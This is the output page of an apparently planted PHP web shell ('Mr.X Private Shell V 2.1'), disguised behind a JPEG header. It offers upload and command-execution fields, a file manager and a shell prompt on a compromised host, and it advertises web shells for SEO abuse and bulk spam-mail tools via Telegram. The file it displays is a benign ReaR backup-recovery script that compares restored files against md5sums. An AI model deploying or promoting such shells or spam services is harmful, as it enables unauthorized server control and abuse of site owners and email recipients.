����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# Skip when there are no checksums:
test -s $VAR_DIR/layout/config/files.md5sum || return 0

LogPrint "Checking if certain restored files are consistent with the recreated system"
DebugPrint "See $VAR_DIR/layout/config/files.md5sum what files are checked"
local md5sum_stdout
# The exit status of the assignment is the exit status of the command substitution
# which is usually the exit status of 'md5sum' that is forwarded by 'chroot'
# except 'chroot' fails (e.g. with 127 if 'md5sum' cannot be found).
# Because the redirections are done before chroot is run
# (in chroot plain 'md5sum -c --quiet' is run with redirected stdin)
# the 'md5sum' stdin comes from VAR_DIR/layout/config/files.md5sum in the recovery system.
# The 'md5sum' stdout messages like
#   /path/to/this: FAILED
#   /path/to/that: FAILED open or read
# provide sufficient information so we do not output 'md5sum' stderr messages like
#   md5sum: /path/to/that: No such file or directory
#   md5sum: WARNING: 1 line is improperly formatted
#   md5sum: WARNING: 1 listed file could not be read
#   md5sum: WARNING: 1 computed checksum did NOT match
# on the user's terminal but have them only in the log file as usual via stderr:
if ! md5sum_stdout="$( chroot $TARGET_FS_ROOT md5sum -c --quiet < $VAR_DIR/layout/config/files.md5sum )" ; then
    LogPrintError "Restored files in $TARGET_FS_ROOT do not fully match the recreated system"
    LogPrintError "(files in the backup are not same as when the ReaR rescue/recovery system was made)"
    # This 'sed' call must not be done in the above command substitution as a pipe
    # because then the command substitution exit status would be the one of 'sed'.
    # Prefix the reported files in the 'md5sum' stdout lines with '/mnt/local'
    # because this is the right path for the user in the currently running ReaR recovery system
    # for the restored files that do not match the md5sums that were saved at "rear mkrescue" time,
    # cf. https://github.com/rear/rear/pull/2954#issuecomment-1467645338 and subsequent comments.
    # The 'md5sum' stdout lines that report files start with '/' because
    # var/lib/rear/layout/config/files.md5sum contains file names with full path.
    # Prefix all 'md5sum' stdout lines with two spaces indentation
    # for better readability what the 'md5sum' stdout lines are:
    LogPrintError "$( sed -e "s|^/|$TARGET_FS_ROOT/|" -e 's/^/  /' <<< "$md5sum_stdout" )"
    LogPrintError "Manually check if those changed files cause issues in your recreated system"
    return 1
fi

Filemanager

Name Type Size Permission Actions
050_prepare_checks.sh File 1.24 KB 0644
060_compare_files.sh File 2.48 KB 0644
110_bind_mount_proc_sys_dev_run.sh File 6.2 KB 0644
520_confirm_finalize.sh File 3.25 KB 0644
880_check_for_mount_by_id.sh File 1.52 KB 0644
890_finish_checks.sh File 1.23 KB 0644
900_remount_sync.sh File 1.24 KB 0644